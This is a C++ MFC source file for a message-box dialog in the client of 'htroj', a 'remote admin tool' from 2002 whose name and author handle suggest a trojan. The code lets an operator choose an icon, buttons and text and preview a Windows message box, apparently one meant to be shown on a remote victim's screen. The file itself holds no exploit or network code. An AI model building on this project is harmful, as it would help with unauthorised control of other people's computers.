/****************************************************
 **              htroj(remote admin tool)          **
 **         (c) hackBOY, hackboy2002@mail.ru       **
 **                                                **
 **             compiled 18:34 24.10.2002          **
 **                                                **
 ****************************************************/
// MessageDlg.cpp : implementation file
//

#include "stdafx.h"
#include "client.h"
#include "MessageDlg.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CMessageDlg dialog


CMessageDlg::CMessageDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CMessageDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CMessageDlg)
	m_Text = _T("");
	m_Title = _T("");
	//}}AFX_DATA_INIT
}


void CMessageDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CMessageDlg)
	DDX_Control(pDX,IDC_RADIO_ERROR, m_Error);
	DDX_Control(pDX,IDC_RADIO_WARNING, m_Warning);
	DDX_Control(pDX,IDC_RADIO_INFORMATION, m_Info);
	DDX_Control(pDX,IDC_RADIO_QUESTION, m_Question);
	DDX_Text(pDX, IDC_EDIT_TEXT, m_Text);
	DDX_Text(pDX, IDC_EDIT_TITLE, m_Title);
	//}}AFX_DATA_MAP
}


BEGIN_MESSAGE_MAP(CMessageDlg, CDialog)
	//{{AFX_MSG_MAP(CMessageDlg)
	ON_BN_CLICKED(IDC_BUTTON_TEST, OnButtonTest)
	ON_BN_CLICKED(IDC_RADIO_ERROR, OnRadioError)
	ON_BN_CLICKED(IDC_RADIO_WARNING, OnRadioWarning)
	ON_BN_CLICKED(IDC_RADIO_INFORMATION, OnRadioInformation)
	ON_BN_CLICKED(IDC_RADIO_QUESTION, OnRadioQuestion)
	ON_BN_CLICKED(IDC_RADIO_NONE, OnRadioNone)
	ON_BN_CLICKED(IDC_RADIO_OK, OnRadioOk)
	ON_BN_CLICKED(IDC_RADIO_OKCANCEL, OnRadioOkcancel)
	ON_BN_CLICKED(IDC_RADIO_YESNO, OnRadioYesno)
	ON_BN_CLICKED(IDC_RADIO_YESNOCANCEL, OnRadioYesnocancel)
	ON_BN_CLICKED(IDC_RADIO_RETRYCANCEL, OnRadioRetrycancel)
	ON_BN_CLICKED(IDC_RADIO_ARL, OnRadioArl)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CMessageDlg message handlers



void CMessageDlg::OnButtonTest() 
{
	UINT m_Icon,m_Butt;
	UpdateData(TRUE);
    switch(m_icon[0])	
	{
	   case '0':m_Icon=NULL;
		   break;
	   case '1':m_Icon=MB_ICONERROR;
		   break;
	   case '2':m_Icon=MB_ICONWARNING;
		   break;
	   case '3':m_Icon=MB_ICONINFORMATION;
		   break;
	   case '4':m_Icon=MB_ICONQUESTION;
		   break;
	};
	switch(m_buttons[0])
	{
	   case '1':m_Butt=MB_OK;
		   break;
       case '2':m_Butt=MB_OKCANCEL;
		   break;
	   case '3':m_Butt=MB_YESNO;
		   break;
	   case '4':m_Butt=MB_YESNOCANCEL;
		   break;
	   case '5':m_Butt=MB_RETRYCANCEL;
		   break;
	   case '6':m_Butt=MB_ABORTRETRYIGNORE;
		   break;
	};
	MessageBox(m_Text,m_Title,m_Butt|m_Icon);
}

BOOL CMessageDlg::OnInitDialog() 
{
	CDialog::OnInitDialog();
	
    m_Error.SetIcon(AfxGetApp()->LoadIcon(IDI_ICON_ERROR));	
	m_Warning.SetIcon(AfxGetApp()->LoadIcon(IDI_ICON_WARNING));	
	m_Info.SetIcon(AfxGetApp()->LoadIcon(IDI_ICON_INFO));	
	m_Question.SetIcon(AfxGetApp()->LoadIcon(IDI_ICON_QUESTION));	
	return TRUE;  // return TRUE unless you set the focus to a control
	              // EXCEPTION: OCX Property Pages should return FALSE
}

void CMessageDlg::FillTree(CTreeCtrl *m_tree)
{
    m_tree->DeleteAllItems();
	HTREEITEM hItem=m_tree->InsertItem("root",0,1);
	m_tree->InsertItem("it's a item",2,3,hItem);
	m_tree->SetItemImage(hItem,0,1);
}

void CMessageDlg::OnRadioError() 
{
  m_icon="1";
}

void CMessageDlg::OnRadioWarning() 
{
  m_icon="2";
}

void CMessageDlg::OnRadioInformation() 
{
  m_icon="3";	
}

void CMessageDlg::OnRadioQuestion() 
{
  m_icon="4";	
}

void CMessageDlg::OnRadioNone() 
{
  m_icon="0";	
}

void CMessageDlg::OnRadioOk() 
{
 m_buttons="1";
}

void CMessageDlg::OnRadioOkcancel() 
{
 m_buttons="2";	
}

void CMessageDlg::OnRadioYesno() 
{
 m_buttons="3";	
}

void CMessageDlg::OnRadioYesnocancel() 
{
 m_buttons="4";	
}

void CMessageDlg::OnRadioRetrycancel() 
{
 m_buttons="5";	
}

void CMessageDlg::OnRadioArl() 
{
 m_buttons="6";	
}
